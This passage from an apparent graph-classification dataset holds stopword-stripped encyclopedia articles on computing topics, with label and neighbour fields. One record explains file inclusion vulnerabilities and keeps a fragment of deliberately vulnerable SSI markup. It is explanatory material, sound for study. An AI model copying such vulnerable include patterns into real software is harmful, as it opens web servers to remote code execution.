    "text": "Chosen-ciphertext_attack:chosen-ciphertext attack chosen-ciphertext attack cca attack model cryptanalysis cryptanalyst gather information obtaining decryptions chosen ciphertexts pieces information adversary attempt recover hidden secret key used decryption formal definitions security chosen-ciphertext attacks see example michael luby mihir bellare et al number otherwise secure schemes defeated chosen-ciphertext attack example el gamal cryptosystem semantically secure chosen-plaintext attack semantic security trivially defeated chosen-ciphertext attack early versions rsa padding used ssl protocol vulnerable sophisticated adaptive chosen-ciphertext attack revealed ssl session keys chosen-ciphertext attacks implications self-synchronizing stream ciphers well designers tamper-resistant cryptographic smart cards must particularly cognizant attacks devices may completely control adversary issue large number chosen-ciphertexts attempt recover hidden secret key clear whether public key cryptosystems withstand chosen ciphertext attack initial breakthrough work moni naor moti yung 1990 suggested mode dual encryption integrity proof known naor-yung encryption paradigm work made understanding notion security chosen ciphertext attack much clearer open research direction constructing systems various protections variants attack cryptosystem vulnerable chosen-ciphertext attack implementers must careful avoid situations adversary might able decrypt chosen-ciphertexts i.e. avoid providing decryption oracle difficult appears even partially chosen ciphertexts permit subtle attacks additionally issues exist cryptosystems rsa use mechanism sign messages decrypt permits attacks hashing used message signed better approach use cryptosystem provably secure chosen-ciphertext attack including among others rsa-oaep secure random oracle heuristics cramer-shoup first public key practical system secure symmetric encryption schemes known authenticated encryption primitive based symmetric encryption gives security chosen ciphertext attacks first shown jonathan katz moti yung chosen-ciphertext attacks like attacks may adaptive non-adaptive adaptive chosen-ciphertext attack attacker use results prior decryptions inform choices ciphertexts decrypted non-adaptive attack attacker chooses ciphertexts decrypted without seeing resulting plaintexts seeing plaintexts attacker longer obtain decryption additional ciphertexts specially noted variant chosen-ciphertext attack lunchtime midnight indifferent attack attacker may make adaptive chosen-ciphertext queries certain point attacker must demonstrate improved ability attack system term lunchtime attack refers idea user computer ability decrypt available attacker user lunch form attack first one commonly discussed obviously attacker ability make adaptive chosen ciphertext queries encrypted message would safe least ability taken away attack sometimes called non-adaptive chosen ciphertext attack non-adaptive refers fact attacker adapt queries response challenge given ability make chosen ciphertext queries expired full adaptive chosen-ciphertext attack attack ciphertexts may chosen adaptively challenge ciphertext given attacker stipulation challenge ciphertext may queried stronger attack notion lunchtime attack commonly referred cca2 attack compared cca1 lunchtime attack practical attacks form rather model important use proofs security chosen-ciphertext attacks proof attacks model impossible implies realistic chosen-ciphertext attack performed practical adaptive chosen-ciphertext attack bleichenbacher attack pkcs 1 numerous cryptosystems proven secure adaptive chosen-ciphertext attacks proving security property based algebraic assumptions additionally requiring idealized random oracle assumption example cramer-shoup system secure based number theoretic assumptions idealization number subtle investigations also established practical scheme rsa-oaep secure rsa assumption idealized random oracle model",
    "neighbors": [
      9058,
      9156,
      11241,
      11119,
      177,
      9745,
      1941,
      1688,
      8286,
      3774,
      4639
    ],
    "mask": "None"
  },
  {
    "node_id": 1798,
    "label": 3,
    "text": "Comparison_of_instruction_set_architectures:comparison instruction set architectures instruction set architecture isa abstract model computer also referred architecture computer architecture realization isa called implementation isa permits multiple implementations may vary performance physical size monetary cost among things isa serves interface software hardware software written isa run different implementations isa enabled binary compatibility different generations computers easily achieved development computer families developments helped lower cost computers increase applicability reasons isa one important abstractions computing today isa defines everything machine language programmer needs know order program computer isa defines differs isas general isas define supported data types state main memory registers semantics memory consistency addressing modes instruction set set machine instructions comprises computer machine language input/output model early decades computing computers used binary decimal even ternary contemporary computers almost exclusively binary computer architectures often described n -bit architectures today n often 8 16 32 64 sizes used actually strong simplification computer architecture often less natural datasizes instruction set hardware implementation may different many architectures instructions operating half and/or twice size respective processors major internal datapaths examples 8080 z80 mc68000 well many others type implementations twice wide operation typically also takes around twice many clock cycles case high performance implementations 68000 instance means 8 instead 4 clock ticks particular chip may described 32-bit architecture 16-bit implementation external databus width often useful determine width architecture ns32008 ns32016 ns32032 basically 32-bit chip different external data buses ns32764 64-bit bus used 32-bit registers width addresses may may different width data early 32-bit microprocessors often 24-bit address system/360 processors number operands one factors may give indication performance instruction set three-operand architecture allow computed one instruction two-operand architecture allow computed one instruction two instructions need executed simulate single three-operand instruction architecture may use big little endianness configurable use either little endian processors order bytes memory least significant byte multi-byte value lowest-numbered memory location big endian architectures instead order significant byte lowest-numbered address x86 architecture well several 8-bit architectures little endian risc architectures sparc power powerpc mips originally big endian arm little endian many including arm configurable endianness applies processors allow individual addressing units data bytes smaller basic addressable machine word usually number registers power two e.g 8 16 32 cases hardwired-to-zero pseudo-register included part register files architectures mostly simplify indexing modes table counts integer registers usable general instructions moment architectures always include special-purpose registers program pointer pc counted unless mentioned note architectures sparc register window architectures count indicates many registers available within register window also non-architected registers register renaming counted note common type architecture load-store synonym register register meaning instructions access memory except special – load register – store register – possible exceptions atomic memory operations locking table compares basic information instruction sets implemented cpu architectures",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      6181,
      8231,
      2088,
      10796,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      7770,
      9309,
      1122,
      7269,
      3175,
      7783,
      8815,
      7281,
      630,
      8822,
      6268,
      3197,
      7820,
      7313,
      663,
      9369,
      6815,
      8352,
      5793,
      6818,
      6821,
      6311,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      4286,
      2241,
      2243,
      9932,
      5326,
      5329,
      5844,
      9428,
      10966,
      731,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      9976,
      249,
      8700,
      8450,
      5380,
      1801,
      6926,
      6415,
      1298,
      11539,
      9500,
      2339,
      6950,
      3886,
      7471,
      309,
      8501,
      8506,
      5948,
      4928,
      833,
      8514,
      9541,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      4450,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      3459,
      398,
      3470,
      5518,
      5523,
      6038,
      407,
      409,
      10145,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      7607,
      8120,
      8125,
      4030,
      8126,
      453,
      3014,
      6607,
      8143,
      977,
      466,
      2517,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      4603,
      508,
      3071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1799,
    "label": 9,
    "text": "Gauche_(Scheme_implementation):gauche scheme implementation gauche r7rs scheme implementation designed scripting production environment intended allow programmers system administrators write scripts support daily operations quick startup built-in system interface native multilingual support key design goals gauche free software bsd license primarily developed shiro kawai",
    "neighbors": [
      10083,
      8262,
      10347,
      5612,
      7983,
      9780,
      10012
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1800,
    "label": 0,
    "text": "Genetic_fuzzy_systems:genetic fuzzy systems genetic fuzzy systems fuzzy systems constructed using genetic algorithms genetic programming mimic process natural evolution identify structure parameter comes automatically identifying building fuzzy system given high degree nonlinearity output traditional linear optimization tools several limitations therefore framework soft computing genetic algorithms gas genetic programming gp methods used successfully identify structure parameters fuzzy systems fuzzy systems fundamental methodologies represent process linguistic information mechanisms deal uncertainty imprecision instance task modeling driver parking car involves greater difficulty writing concise mathematical model description becomes detailed however level difficulty much using simple linguistic rules fuzzy remarkable attributes fuzzy systems widely successfully applied control classification modeling problems mamdani 1974 klir yuan 1995 pedrycz gomide 1998 although simplistic design identification fuzzy system rather complex task comprises identification input output variables b rule base knowledge base c membership functions mapping parameters usually rule base consists several if-then rules linking input output simple rule fuzzy controller could temperature hot cooling high numerical impact/meaning rule depends membership functions hot high shaped defined construction identification fuzzy system divided structure b parameter identification fuzzy system structure fuzzy system expressed input output variables rule base parameters fuzzy system rule parameters defining membership functions aggregation operator implication function mapping parameters related mapping crisp set fuzzy set vice versa bastian 2000 much work done develop adapt methodologies capable automatically identifying fuzzy system numerical data particularly framework soft computing significant methodologies proposed objective building fuzzy systems means genetic algorithms gas genetic programming gp given high degree nonlinearity output fuzzy system traditional linear optimization tools limitations genetic algorithms demonstrated robust powerful tool perform tasks generation fuzzy rule base optimization fuzzy rule bases generation membership functions tuning membership functions cordón et al. 2001a tasks considered optimization search processes within large solution spaces bastian hayashi 1995 yuan zhuang 1996 cordón et al. 2001b genetic algorithms powerful tools identify fuzzy membership functions pre-defined rule base limitation especially also comes identify input output variables fuzzy system given set data genetic programming used identify input variables rule base well involved membership functions fuzzy model bastian 2000 last decade multi-objective optimization fuzzy rule based systems attracted wide interest within research community practitioners based use stochastic algorithms multi-objective optimization search pareto efficiency multiple objectives scenario instance objectives simultaneously optimize accuracy complexity accuracy interpretability recent review field provided work fazzolari et al 2013 addition 1 provides up-to-date continuously growing list references subject",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1801,
    "label": 3,
    "text": "Computer_data_storage:computer data storage digvijay singh computer data storage often called storage memory technology consisting computer components recording media used retain digital data core function fundamental component computers central processing unit cpu computer manipulates data performing computations practice almost computers use storage hierarchy puts fast expensive small storage options close cpu slower larger cheaper options farther away generally fast volatile technologies lose data power referred memory slower persistent technologies referred storage even first computer designs charles babbage analytical engine percy ludgate analytical machine clearly distinguished processing memory babbage stored numbers rotations gears ludgate stored numbers displacements rods shuttles distinction extended von neumann architecture cpu consists two main parts control unit arithmetic logic unit alu former controls flow data cpu memory latter performs arithmetic logical operations data without significant amount memory computer would merely able perform fixed operations immediately output result would reconfigured change behavior acceptable devices desk calculators digital signal processors specialized devices von neumann machines differ memory store operating instructions data computers versatile need hardware reconfigured new program simply reprogrammed new in-memory instructions also tend simpler design relatively simple processor may keep state successive computations build complex procedural results modern computers von neumann machines modern digital computer represents data using binary numeral system text numbers pictures audio nearly form information converted string bits binary digits value 1 0 common unit storage byte equal 8 bits piece information handled computer device whose storage space large enough accommodate binary representation piece information simply data example complete works shakespeare 1250 pages print stored five megabytes 40 million bits one byte per character data encoded assigning bit pattern character digit multimedia object many standards exist encoding e.g. character encodings like ascii image encodings like jpeg video encodings like mpeg-4 adding bits encoded unit redundancy allows computer detect errors coded data correct based mathematical algorithms errors generally occur low probabilities due random bit value flipping physical bit fatigue loss physical bit storage ability maintain distinguishable value 0 1 due errors inter intra-computer communication random bit flip e.g. due random radiation typically corrected upon detection bit group malfunctioning physical bits always specific defective bit known group definition depends specific storage device typically automatically fenced-out taken use device replaced another functioning equivalent group device corrected bit values restored possible cyclic redundancy check crc method typically used communications storage error detection detected error retried data compression methods allow many cases database represent string bits shorter bit string compress reconstruct original string decompress needed utilizes substantially less storage tens percents many types data cost computation compress decompress needed analysis trade-off storage cost saving costs related computations possible delays data availability done deciding whether keep certain data compressed security reasons certain types data e.g. credit-card information may kept encrypted storage prevent possibility unauthorized information reconstruction chunks storage snapshots generally lower storage hierarchy lesser bandwidth greater access latency cpu traditional division storage primary secondary tertiary off-line storage also guided cost per bit contemporary usage memory usually semiconductor storage read-write random-access memory typically dram dynamic ram forms fast temporary storage storage consists storage devices media directly accessible cpu secondary tertiary storage typically hard disk drives optical disc drives devices slower ram non-volatile retaining contents powered historically memory called core memory main memory real storage internal memory meanwhile non-volatile storage devices referred secondary storage external memory auxiliary/peripheral storage primary storage also known main memory internal memory prime memory often referred simply memory one directly accessible cpu cpu continuously reads instructions stored executes required data actively operated also stored uniform manner historically early computers used delay lines williams tubes rotating magnetic drums primary storage 1954 unreliable methods mostly replaced magnetic core memory core memory remained dominant 1970s advances integrated circuit technology allowed semiconductor memory become economically competitive led modern random-access memory ram small-sized light quite expensive time particular types ram used primary storage also volatile i.e lose information powered shown diagram traditionally two sub-layers primary storage besides main large-capacity ram main memory directly indirectly connected central processing unit via memory bus actually two buses diagram address bus data bus cpu firstly sends number address bus number called memory address indicates desired location data reads writes data memory cells using data bus additionally memory management unit mmu small device cpu ram recalculating actual memory address example provide abstraction virtual memory tasks ram types used primary storage volatile uninitialized start computer containing storage would source read instructions order start computer hence non-volatile primary storage containing small startup program bios used bootstrap computer read larger program non-volatile secondary storage ram start execute non-volatile technology used purpose called rom read-only memory terminology may somewhat confusing rom types also capable random access many types rom literally read updates possible however slow memory must erased large portions re-written embedded systems run programs directly rom similar programs rarely changed standard computers store non-rudimentary programs rom rather use large capacities secondary storage non-volatile well costly recently primary storage secondary storage uses refer historically called respectively secondary storage tertiary storage secondary storage also known external memory auxiliary storage differs primary storage directly accessible cpu computer usually uses input/output channels access secondary storage transfer desired data primary storage secondary storage non-volatile retaining data power shut modern computer systems typically two orders magnitude secondary storage primary storage secondary storage less expensive modern computers hard disk drives hdds solid-state drives ssds usually used secondary storage access time per byte hdds ssds typically measured milliseconds one thousandth seconds access time per byte primary storage measured nanoseconds one billionth seconds thus secondary storage significantly slower primary storage rotating optical storage devices cd dvd drives even longer access times examples secondary storage technologies include usb flash drives floppy disks magnetic tape paper tape punched cards ram disks disk read/write head hdds reaches proper placement data subsequent data track fast access reduce seek time rotational latency data transferred disks large contiguous blocks sequential block access disks orders magnitude faster random access many sophisticated paradigms developed design efficient algorithms based upon sequential block access another way reduce i/o bottleneck use multiple disks parallel order increase bandwidth primary secondary memory secondary storage often formatted according file system format provides abstraction necessary organize data files directories also providing metadata describing owner certain file access time access permissions information computer operating systems use concept virtual memory allowing utilization primary storage capacity physically available system primary memory fills system moves least-used chunks pages swap file page file secondary storage retrieving later needed lot pages moved slower secondary storage system performance degraded tertiary storage tertiary memory level secondary storage typically involves robotic mechanism mount insert dismount removable mass storage media storage device according system demands data often copied secondary storage use primarily used archiving rarely accessed information since much slower secondary storage e.g 5–60 seconds vs. 1–10 milliseconds primarily useful extraordinarily large data stores accessed without human operators typical examples include tape libraries optical jukeboxes computer needs read information tertiary storage first consult catalog database determine tape disc contains information next computer instruct robotic arm fetch medium place drive computer finished reading information robotic arm return medium place library tertiary storage also known nearline storage near online formal distinction online nearline offline storage example always-on spinning hard disk drives online storage spinning drives spin automatically massive arrays idle disks maid nearline storage removable media tape cartridges automatically loaded tape libraries nearline storage tape cartridges must manually loaded offline storage off-line storage computer data storage medium device control processing unit medium recorded usually secondary tertiary storage device physically removed disconnected must inserted connected human operator computer access unlike tertiary storage accessed without human interaction off-line storage used transfer information since detached medium easily physically transported additionally case disaster example fire destroys original data medium remote location probably unaffected enabling disaster recovery off-line storage increases general information security since physically inaccessible computer data confidentiality integrity affected computer-based attack techniques also information stored archival purposes rarely accessed off-line storage less expensive tertiary storage modern personal computers secondary tertiary storage media also used off-line storage optical discs flash memory devices popular much lesser extent removable hard disk drives enterprise uses magnetic tape predominant older examples floppy disks zip disks punched cards storage technologies levels storage hierarchy differentiated evaluating certain core characteristics well measuring characteristics specific particular implementation core characteristics volatility mutability accessibility addressability particular implementation storage technology characteristics worth measuring capacity performance non-volatile memory retains stored information even constantly supplied electric power suitable long-term storage information volatile memory requires constant power maintain stored information fastest memory technologies volatile ones although universal rule since primary storage required fast predominantly uses volatile memory dynamic random-access memory form volatile memory also requires stored information periodically reread rewritten refreshed otherwise would vanish static random-access memory form volatile memory similar dram exception never needs refreshed long power applied loses content power supply lost uninterruptible power supply ups used give computer brief window time move information primary volatile storage non-volatile storage batteries exhausted systems example emc symmetrix integrated batteries maintain volatile storage several minutes utilities hdparm sar used measure io performance linux full disk encryption volume virtual disk encryption andor file/folder encryption readily available storage devices hardware memory encryption available intel architecture supporting total memory encryption tme page granular memory encryption multiple keys mktme sparc m7 generation since october 2015.. commonly used data storage media semiconductor magnetic optical paper still sees limited usage fundamental storage technologies all-flash arrays afas proposed development semiconductor memory uses semiconductor-based integrated circuits store information semiconductor memory chip may contain millions tiny transistors capacitors volatile non-volatile forms semiconductor memory exist modern computers primary storage almost exclusively consists dynamic volatile semiconductor memory dynamic random-access memory since turn century type non-volatile semiconductor memory known flash memory steadily gained share off-line storage home computers non-volatile semiconductor memory also used secondary storage various advanced electronic devices specialized computers designed early 2006 notebook desktop computer manufacturers started using flash-based solid-state drives ssds default configuration options secondary storage either addition instead traditional hdd magnetic storage uses different patterns magnetization magnetically coated surface store information magnetic storage non-volatile information accessed using one read/write heads may contain one recording transducers read/write head covers part surface head medium must moved relative another order access data modern computers magnetic storage take forms early computers magnetic storage also used optical storage typical optical disc stores information deformities surface circular disc reads information illuminating surface laser diode observing reflection optical disc storage non-volatile deformities may permanent read media formed write media reversible recordable read/write media following forms currently common use magneto-optical disc storage optical disc storage magnetic state ferromagnetic surface stores information information read optically written combining magnetic optical methods magneto-optical disc storage non-volatile sequential access slow write fast read storage used tertiary off-line storage 3d optical data storage also proposed light induced magnetization melting magnetic photoconductors also proposed high-speed low-energy consumption magneto-optical storage paper data storage typically form paper tape punched cards long used store information automatic processing particularly general-purpose computers existed information recorded punching holes paper cardboard medium read mechanically later optically determine whether particular location medium solid contained hole technologies allow people make marks paper easily read machine—these widely used tabulating votes grading standardized tests barcodes made possible object sold transported computer readable information securely attached group bits malfunction may resolved error detection correction mechanisms see storage device malfunction requires different solutions following solutions commonly used valid storage devices device mirroring typical raid designed handle single device failure raid group devices however second failure occurs raid group completely repaired first failure data lost probability single failure typically small thus probability two failures raid group time proximity much smaller approximately probability squared i.e. multiplied database tolerate even smaller probability data loss raid group replicated mirrored many cases mirroring done geographically remotely different storage array handle also recovery disasters see disaster recovery secondary tertiary storage may connect computer utilizing computer networks concept pertain primary storage shared multiple processors lesser degree large quantities individual magnetic tapes optical magneto-optical discs may stored robotic tertiary storage devices tape storage field known tape libraries optical storage field optical jukeboxes optical disk libraries per analogy smallest forms either technology containing one drive device referred autoloaders autochangers robotic-access storage devices may number slots holding individual media usually one picking robots traverse slots load media built-in drives arrangement slots picking devices affects performance important characteristics storage possible expansion options adding slots modules drives robots tape libraries may 10 100,000 slots provide terabytes petabytes near-line information optical jukeboxes somewhat smaller solutions 1,000 slots robotic storage used backups high-capacity archives imaging medical video industries hierarchical storage management known archiving strategy automatically migrating long-unused files fast hard disk storage libraries jukeboxes files needed retrieved back disk",
    "neighbors": [
      2051,
      2066,
      2073,
      29,
      2077,
      8231,
      8233,
      8235,
      8236,
      2104,
      4154,
      8254,
      2113,
      6210,
      8266,
      2127,
      4183,
      10327,
      4193,
      10340,
      4221,
      4235,
      6286,
      4241,
      4248,
      6296,
      8352,
      4257,
      2212,
      2217,
      6322,
      4285,
      4286,
      10429,
      2241,
      6338,
      2243,
      10436,
      8395,
      10455,
      6361,
      2269,
      10469,
      2284,
      10485,
      2294,
      8438,
      249,
      8446,
      6406,
      10504,
      6415,
      274,
      8469,
      8485,
      10535,
      10237,
      309,
      8501,
      6464,
      8514,
      4423,
      6476,
      2383,
      8531,
      4438,
      2395,
      6491,
      8543,
      8551,
      10603,
      2415,
      4465,
      6514,
      2421,
      2424,
      2432,
      6532,
      8582,
      398,
      407,
      4513,
      2473,
      10669,
      2480,
      10675,
      437,
      6601,
      466,
      10706,
      10711,
      4571,
      2530,
      10734,
      6639,
      4592,
      499,
      4596,
      2550,
      8700,
      2558,
      8729,
      4634,
      4636,
      10781,
      8737,
      10789,
      4664,
      8762,
      8765,
      2623,
      2625,
      2638,
      594,
      597,
      2648,
      8793,
      10850,
      8815,
      8816,
      630,
      631,
      8822,
      6785,
      2693,
      2700,
      2710,
      10909,
      6815,
      8863,
      6818,
      2723,
      10916,
      6821,
      10921,
      2731,
      2744,
      2745,
      8890,
      6843,
      8897,
      2755,
      10951,
      2762,
      4819,
      10966,
      731,
      8937,
      746,
      10985,
      4845,
      8944,
      757,
      2805,
      6926,
      11030,
      8994,
      6950,
      6963,
      823,
      2871,
      4928,
      2895,
      850,
      9044,
      2901,
      4954,
      860,
      11106,
      7022,
      2930,
      7027,
      7033,
      11129,
      2944,
      9090,
      9097,
      11147,
      11152,
      9112,
      7072,
      9126,
      9129,
      5051,
      7104,
      3014,
      5062,
      5090,
      995,
      998,
      7148,
      3053,
      9201,
      3058,
      5120,
      7173,
      11269,
      7175,
      9232,
      5170,
      7218,
      3124,
      5177,
      9277,
      7234,
      3142,
      7244,
      1104,
      7249,
      5202,
      9306,
      1122,
      11363,
      3173,
      7270,
      3175,
      3181,
      5231,
      5233,
      9333,
      1150,
      9343,
      9345,
      7312,
      7313,
      3219,
      7323,
      3247,
      9391,
      3265,
      11459,
      1231,
      5329,
      3285,
      7381,
      7383,
      3289,
      11487,
      5358,
      3314,
      1273,
      7417,
      5373,
      3328,
      1286,
      9484,
      11535,
      1298,
      11539,
      7446,
      11543,
      3366,
      11568,
      11573,
      1352,
      5452,
      3406,
      1361,
      7505,
      11604,
      3420,
      11614,
      5471,
      1376,
      7521,
      1378,
      7525,
      11626,
      9585,
      11633,
      5491,
      11636,
      1399,
      1402,
      11645,
      9599,
      3457,
      1421,
      3470,
      5518,
      5523,
      9625,
      11676,
      5535,
      1449,
      11695,
      5552,
      11698,
      1461,
      1463,
      3512,
      7607,
      9665,
      3522,
      9671,
      1480,
      3529,
      9688,
      1499,
      9693,
      1502,
      5598,
      1515,
      9707,
      1517,
      9710,
      9714,
      3572,
      1531,
      5629,
      3582,
      9731,
      9739,
      7699,
      5655,
      5661,
      9762,
      7715,
      7718,
      7720,
      3629,
      5677,
      3640,
      1593,
      9788,
      9791,
      5709,
      3662,
      1637,
      3698,
      9844,
      7802,
      7810,
      5769,
      5793,
      1707,
      7852,
      7858,
      1718,
      7863,
      9911,
      5819,
      9926,
      9932,
      5840,
      9936,
      3794,
      9955,
      7911,
      9964,
      1776,
      5872,
      5880,
      1788,
      7932,
      1798,
      1801,
      10000,
      1809,
      3857,
      1818,
      10016,
      3880,
      5933,
      7983,
      5948,
      10051,
      3909,
      8007,
      3913,
      3919,
      10068,
      1880,
      5979,
      1885,
      1890,
      1891,
      3953,
      10101,
      10104,
      1922,
      6018,
      1927,
      6033,
      1940,
      3990,
      1946,
      10151,
      4012,
      6062,
      1967,
      8122,
      4030,
      1990,
      1993,
      10200,
      4073,
      8179,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1802,
    "label": 9,
    "text": "Ajax_(programming):ajax programming ajax also ajax short asynchronous javascript xml set web development techniques using many web technologies client side create asynchronous web applications ajax web applications send retrieve data server asynchronously background without interfering display behavior existing page decoupling data interchange layer presentation layer ajax allows web pages extension web applications change content dynamically without need reload entire page practice modern implementations commonly utilize json instead xml ajax single technology rather group technologies html css used combination mark style information webpage modified javascript dynamically display—and allow user interact with—the new information built-in xmlhttprequest object since 2017 new fetch function within javascript commonly used execute ajax webpages allowing websites load content onto screen without refreshing page ajax new technology different language existing technologies used new ways early-to-mid 1990s web sites based complete html pages user action required complete new page loaded server process inefficient reflected user experience page content disappeared new page appeared time browser reloaded page partial change content re-sent even though information changed placed additional load server made bandwidth limiting factor performance 1996 iframe tag introduced internet explorer like object element load fetch content asynchronously 1998 microsoft outlook web access team developed concept behind xmlhttprequest scripting object appeared xmlhttp second version msxml library shipped internet explorer 5.0 march 1999 functionality xmlhttp activex control ie 5 later implemented mozilla safari opera browsers xmlhttprequest javascript object microsoft adopted native xmlhttprequest model internet explorer 7 activex version still supported internet explorer microsoft edge utility background http requests asynchronous web technologies remained fairly obscure started appearing large scale online applications outlook web access 2000 oddpost 2002 google made wide deployment standards-compliant cross browser ajax gmail 2004 google maps 2005 october 2004 kayak.com public beta release among first large-scale e-commerce uses developers time called xml http thing increased interest ajax among web program developers term ajax publicly used 18 february 2005 jesse james garrett article titled ajax new approach web applications based techniques used google pages 5 april 2006 world wide web consortium w3c released first draft specification xmlhttprequest object attempt create official web standard latest draft xmlhttprequest object published 6 october 2016 term ajax come represent broad group web technologies used implement web application communicates server background without interfering current state page article coined term ajax jesse james garrett explained following technologies incorporated since however number developments technologies used ajax application definition term ajax xml longer required data interchange therefore xslt longer required manipulation data javascript object notation json often used alternative format data interchange although formats preformatted html plain text also used variety popular javascript libraries including jquery include abstractions assist executing ajax requests asynchronous html http ahah involves using xmlhttprequest retrieve x html fragments inserted directly web page example simple ajax request using get method written javascript get-ajax-data.js send-ajax-data.php many developers dislike syntax used xmlhttprequest object following workarounds created popular javascript library jquery implemented abstractions enable developers use ajax conveniently although still uses xmlhttprequest behind scenes following client-side implementation example using 'ajax method jquery also implements 'get method allows code written concisely .get 'send-ajax-data.php .done function data .fail function data fetch new native javascript api although yet fully supported browsers gaining momentum popular way execute ajax according google developers documentation fetch makes easier make web requests handle responses older xmlhttprequest fetch 'send-ajax-data.php // es7 async/await example async function doajax doajax seen fetch relies javascript promises",
    "neighbors": [
      9732,
      6154,
      9229,
      1556,
      3604,
      6176,
      7713,
      3626,
      7212,
      10284,
      4658,
      1083,
      64,
      4171,
      5198,
      5199,
      8289,
      4707,
      4198,
      7784,
      9834,
      113,
      9841,
      119,
      124,
      5765,
      6791,
      1674,
      148,
      5784,
      1698,
      1203,
      8883,
      7862,
      4797,
      5311,
      7871,
      6338,
      1223,
      11466,
      11469,
      7374,
      10451,
      10453,
      1240,
      5849,
      8923,
      6366,
      225,
      6371,
      4326,
      10991,
      3833,
      3323,
      3848,
      10506,
      1812,
      5915,
      10526,
      803,
      10020,
      11559,
      296,
      10026,
      4920,
      3920,
      339,
      9560,
      9561,
      865,
      10097,
      1910,
      10624,
      8068,
      3462,
      8584,
      3466,
      6028,
      11154,
      1944,
      8605,
      5031,
      5543,
      6576,
      9138,
      2485,
      438,
      5048,
      1468,
      1470,
      8644,
      5067,
      4056,
      5593,
      479,
      482,
      9195,
      5612,
      5101,
      8689,
      8179,
      10739,
      502,
      10744,
      7673,
      9211,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 1803,
    "label": 4,
    "text": "File_inclusion_vulnerability:file inclusion vulnerability file inclusion vulnerability type web vulnerability commonly found affect web applications rely scripting run time issue caused application builds path executable code using attacker-controlled variable way allows attacker control file executed run time file include vulnerability distinct generic directory traversal attack directory traversal way gaining unauthorized file system access file inclusion vulnerability subverts application loads code execution successful exploitation file inclusion vulnerability result remote code execution web server runs affected web application attacker use remote code execution create web shell web server used website defacement remote file inclusion rfi occurs web application downloads executes remote file remote files usually obtained form http ftp uri user-supplied parameter web application local file inclusion lfi similar remote file inclusion vulnerability except instead including remote files local files i.e files current server included execution issue still lead remote code execution including file contains attacker-controlled data web server access logs php main cause due use unvalidated user-input filesystem function includes file execution notable codice_1 codice_2 statements vulnerabilities attributed novice programmers familiar capabilities php programming language php language directive enabled allows filesystem functions use url retrieve data remote locations directive codice_3 php versions 4.3.4 codice_4 since php 5.2.0 php 5.x directive disabled default prior versions enabled default exploit vulnerability attacker alter variable passed one functions cause include malicious code remote resource mitigate vulnerability user input needs validated used consider php script includes file specified request php form method= get /form developer intended read codice_5 codice_6 alter application behavior display language user choice possible inject another path using codice_7 parameter best solution case use whitelist accepted language parameters strong method input validation whitelist used rely upon input filtering validation passed-in path make sure contain unintended characters character patterns however may require anticipating possible problematic character combinations safer solution use predefined switch/case statement determine file include rather use url form parameter dynamically generate path javaserver pages jsp scripting language include files execution runtime following script vulnerable file inclusion vulnerability server side include uncommon typically enabled default web server server-side include used gain remote code execution vulnerable web server following code vulnerable remote-file inclusion vulnerability doctype html html head title test file /title /head body -- include file= user_language -- /body /html code xss vulnerability rather including new file executed server",
    "neighbors": [
      2432,
      2945,
      5888,
      899,
      5636,
      522,
      4494,
      11154,
      1429,
      5397,
      9762,
      10412,
      5682,
      10492,
      4797,
      7364,
      8644,
      331,
      10959,
      225,
      612,
      4198,
      7526,
      119,
      3708
    ],
    "mask": "None"
  },
  {
    "node_id": 1804,
    "label": 2,
    "text": "TOPS-10:tops-10 tops-10 system timesharing total operating system-10 discontinued operating system digital equipment corporation dec pdp-10 decsystem-10 mainframe computer family launched 1967 tops-10 evolved earlier monitor software pdp-6 pdp-10 computers renamed tops-10 1970 tops-10 supported shared memory allowed development one first true multiplayer computer games game called decwar text-oriented star trek type game users terminals typed commands fought real time tops-10 also home original multi user dungeon mud fore runner today mmorpgs another groundbreaking application called forum application perhaps first so-called cb simulator allowed users converse one another known chat room application showed potential multi-user communication led development compuserve chat application tops-10 robust application programming interface api used mechanism called uuo unimplemented user operation uuos implemented operating system calls way made look like machine instructions monitor call api much ahead time like operating system made system programming decsystem-10s simple powerful tops-10 scheduler supported prioritized run queues appended process onto queue depending priority system also included user file device independence following list commands supported tops-10 pdp-6 monitor software first released 1964 support pdp-10 ka10 processor added monitor release 2.18 1967 tops-10 name first used 1970 release 5.01 release 6.01 may 1974 first tops-10 implement virtual memory demand paging enabling programs larger physical memory run release 7.00 onwards symmetrical multiprocessing available opposed master/slave arrangement used final release tops-10 7.04 1988 hobbyists entitled set use tops-10 hobbyist license easiest way hobbyist run tops-10 acquire suitable emulator operating system image tops-10 may also generated archived original distribution tapes paul allen maintained several publicly accessible historic computer systems including decsystem-2065 running tops-10 request account try running tops-10 original equipment tops-10 assembler macro-10 bundled tops-10 distribution following programming languages implemented tops-10 layered products following programming languages implemented tops-10 contributions decus members following major user utilities implemented tops-10 ms-dos heavily influenced tops-10 identical elements include three character long file extensions several standard extensions eg exe txt asterisk wildcard usage slash character switch separator",
    "neighbors": [
      512,
      2560,
      2,
      6155,
      6675,
      7187,
      7189,
      10776,
      25,
      8729,
      4637,
      9759,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      3650,
      8262,
      4684,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      3216,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8876,
      5293,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      7867,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      2261,
      1750,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      4331,
      7403,
